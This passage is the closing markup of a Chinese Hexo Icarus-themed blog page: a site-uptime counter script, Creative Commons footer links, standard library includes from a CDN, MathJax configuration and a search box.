id="times">载入时分秒...</span><script>
                            var now = new Date();
                            function createtime() {
                                var grt= new Date("10/1/2021 16:23:00");//此处修改你的建站时间或者网站上线时间
                                now.setTime(now.getTime()+250);
                                days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
                                hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
                                if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
                                mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
                                seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
                                snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
                                document.getElementById("timeDate").innerHTML = "| 本站已运行 "+dnum+" 天 ";
                                document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
                            }
                            setInterval("createtime()",250);
                            </script></p><p class="is-size-7">© 2021-2023</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/x-mathjax-config">MathJax.Hub.Config({
            'HTML-CSS': {
                matchFontHeight: false
            },
            SVG: {
                matchFontHeight: false
            },
            CommonHTML: {
                matchFontHeight: false
            },
            tex2jax: {
                inlineMath: [
                    ['$','$'],
                    ['\\(','\\)']
                ]
            }
        });</script><script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.9/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>